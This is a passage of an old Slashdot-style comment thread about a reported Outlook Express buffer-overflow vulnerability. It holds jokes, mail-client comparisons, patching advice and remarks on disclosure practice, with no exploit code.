    See you on the links,

    President of the United States.

    --
    I had a SIG once... it was years ago.
  221. Talk about a sign from God! by TunaPhish · · Score: 1

    I just freshly installed Windows ME RTM on my windows box, and I was considering what e-mail client I should install on it. I thought, well I've used Eudora and Netscape in the past, but I think I'll try and keep this installation using all Microsoft stuff to see what happens . . . Then, I opened up /. to see this article on top.... hmm... maybe I'll stick with Eudora..

  222. Suggestions to Microsoft(tm) by Hygelac · · Score: 1

    I'm no fan of false advertising, and Microsoft(tm) consumers would be a lot better off if Microsoft(tm) would be straight with them. Here are some suggestions on what Microsoft(tm) should change the name of Outlook(R) to:

    - Outbreak
    - Lookout
    - Petrydish

    My personal fav is Outbreak. ;-)

    --
    -- Grow up and use mutt.
  223. Eudora question by skinnymofo · · Score: 1

    DQ: What big security holes are in Eudora? Probably nothing on the level of the Outlook ones.

    --
    Happiness is like peeing yourself, only you can feel the warmth.
  224. Conflict of Interest! by LabWeasel · · Score: 2

    Gee, I wonder why MSNBC sat on this information for five weeks before reporting on it at all. Does anyone really think CNN would have gagged itself? Ok, maybe that's not the best example... Still, it does make me wonder.

  225. Re:*yawn* more microsoft bashing by nnet · · Score: 1
    "I would like to see the linux community make a better email program then outlook. We all know it won't happen, the so called linux community is only able to steal ideas"

    Better is totally subjective. MS Outlook may be better for you, but not for me, and I venture I'm not the only one that doesn't have to rely on it. But hey, even ACs must be given their right to express themselves. Once a troll, always a troll.

  226. Two step user response: by dkh2 · · Score: 1
    1. Stop using MS Outlook!!!!
    2. Utilize code for this beast to e-mail as many MS execs as I can identify so I can own them
    --
    My office has been taken over by iPod people.
  227. Not as bad as it might seem by Dave+The+Magni · · Score: 2

    I haven't yet seen a comment that points out a critical factor for this bug:

    You need to use Outlook(Express) as your Internet mail client, and not in its "Corporate and Workgroup" mode.

    This saves a lot of the hassle for office types running their own mail servers.

    See the NTBUGTRAQ article for more details.

  228. million microsoft monkeys by wrenling · · Score: 1

    I think they are already trying that approach. Problem is that they have the monkeys convinced that everything MS is good.. therefore there is nothing to fix!

    --
    Check out Magic Firesheep!
  229. C / C++ etc. by lonely · · Score: 1

    Can all suffer from buffer overruns. Now what you want is a nice bit of Java.

    :-)

    Sorry couldn't resist.

  230. Quick fix for Outlook Express users by RayChuang · · Score: 2

    If you are running Internet Explorer 4.x, 5.0 and 5.01, the fastest solution to avoid this exploit is to immediately upgrade to at least Internet Explorer 5.01 Service Pack 1.

    IE 5.01 SP1 (which avoids the hassles that have plagued some IE 5.5 users) not only has an upgraded browser (which corrects a problem where certain .OCX controls specific to IE can cause memory leak problems) but also incorporates Outlook Express 5.5, which is not vulnerable to the exploit described by USSR Labs.

    I believe there will be a fix available on the Windows Update web site that will correct this issue by upgrading a number of .DLL files--but this is only for IE 4.x and IE 5.0/5.01 users.

    --
    Raymond in Mountain View, CA
  231. Standard practices... by stefanlasiewski · · Score: 1

    "MSNBC.com learned of the flag June 11, but agreed not to publish the information until Microsoft had a chance to supply a fix. That's standard practice in the computer security business in order to prevent possible harm to computer users."

    Actually, I thought Microsoft's standard practice was to create enormous security holes in their products wait until the virus spread and caused $Millions - $Billions of damage before issuing a fix :)

    --
    "Can of worms? The can is open... the worms are everywhere."
  232. Neat trick! by operagost · · Score: 1

    But does that work on 5.5? Your outgoing messages are dated on the server, not the local machine. Or do you have to be in remote mode?

    --

    Gamingmuseum.com: Give your 3D accelerator a rest.
  233. The outlook scripting is for enterprise apps by earache · · Score: 1
    I do believe that Microsoft showed very little insight when including scripting capabilities

    Maybe you should explore a little deeper and then you'd realize that the scripting/forms capability of Outlook (as well as Outlook in general) is meant for enterprise solutions. Bill, in the IT department, can put together a survey form or some other data gathering form for Greg, in the marketing department. They can then email this form to everyone in the enterprise. Everyone fills out the form and the responses get put in a database via outlook and exchange.

    Alternately, you can use scripting/forms to write automated interfaces to mass company emails. June, in the PR department, sends out press release notifications to the company. Thanks to Bill, in the IT department, who wrote an outlook template form, June simply needs to type in some simple info and hit send, everything ready formatted to her liking.

    Now couple this with calendaring, tasks, contacts, etc. and you start to see a valuable environment for enterprise development.

    SO THIS IS THE REASON OUTLOOK INCLUDES SCRIPTING.

  234. The *only* solution? by xTown · · Score: 2
    The article said that the only solution to the problem was to patch Outlook.

    Wouldn't a better solution be to stop using Outlook completely?